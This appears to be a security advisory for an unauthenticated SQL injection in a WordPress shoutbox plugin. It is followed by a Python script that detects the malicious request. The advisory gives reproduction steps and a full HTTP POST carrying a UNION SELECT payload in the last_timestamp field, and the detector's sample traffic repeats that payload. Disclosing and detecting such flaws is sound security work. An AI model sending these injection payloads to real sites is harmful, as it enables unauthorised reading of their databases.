The plugin does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection.
Submit a message in the chatbox and intercept the request (using Burp Suite, for example).
Edit the request body to match the following: action=shoutbox-ajax-update-messages&last_timestamp=0)+UNION+ALL+SELECT+NULL,NULL,(SELECT+CONCAT(0x776562657870)),NULL,NULL,NULL,NULL,NULL--+&rooms%5B%5D=default
Send the request; it will succeed and also list previous messages.
POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Origin: http://localhost
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: Shoutbox_alias=Guest_209
Connection: close

action=shoutbox-ajax-update-messages&last_timestamp=0)+UNION+ALL+SELECT+NULL,NULL,(SELECT+CONCAT(0x776562657870)),NULL,NULL,NULL,NULL,NULL--+&rooms%5B%5D=default
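
A detection check for the request shown above, as an added example that is not part of the original advisory or the plugin's code: it parses form-encoded admin-ajax.php POST bodies and flags any shoutbox-ajax-update-messages request whose last_timestamp is not a plain number. The accepted numeric format, the function names and the sample client addresses are assumptions.

```python
import re
from urllib.parse import parse_qs

ACTION = "shoutbox-ajax-update-messages"   # AJAX action from the advisory
PARAM = "last_timestamp"                   # parameter carrying the payload in the advisory
# Assumption: legitimate clients send a plain decimal timestamp here.
NUMERIC = re.compile(r"[0-9]{1,20}(\.[0-9]{1,6})?")


def classify(body):
    """Return (verdict, reason) for one form-encoded admin-ajax.php POST body."""
    fields = parse_qs(body, keep_blank_values=True)   # also URL-decodes '+' and %xx
    if ACTION not in fields.get("action", []):
        return ("ignore", "different AJAX action")
    values = fields.get(PARAM, [])
    if not values:
        return ("ok", "parameter absent")
    if len(values) > 1:
        return ("suspicious", "parameter repeated")
    if NUMERIC.fullmatch(values[0]):
        return ("ok", "numeric timestamp")
    return ("suspicious", "non-numeric value: %r" % values[0][:40])


def scan(requests):
    """requests: iterable of (client, path, body); return flagged (client, reason) pairs."""
    flagged = []
    for client, path, body in requests:
        if not path.split("?", 1)[0].endswith("/wp-admin/admin-ajax.php"):
            continue
        verdict, reason = classify(body)
        if verdict == "suspicious":
            flagged.append((client, reason))
    return flagged


# Constructed sample traffic; the second body is the one shown in the advisory.
SAMPLE = [
    ("198.51.100.7", "/wp-admin/admin-ajax.php",
     "action=shoutbox-ajax-update-messages&last_timestamp=1650000000&rooms%5B%5D=default"),
    ("203.0.113.9", "/wp-admin/admin-ajax.php",
     "action=shoutbox-ajax-update-messages&last_timestamp=0)+UNION+ALL+SELECT+NULL,NULL,"
     "(SELECT+CONCAT(0x776562657870)),NULL,NULL,NULL,NULL,NULL--+&rooms%5B%5D=default"),
    ("198.51.100.7", "/wp-admin/admin-ajax.php", "action=heartbeat&last_timestamp=x"),
]

if __name__ == "__main__":
    for client, reason in scan(SAMPLE):
        print(client, reason)
```

The same numeric check applies server-side: a value that fails it should never reach the SQL statement.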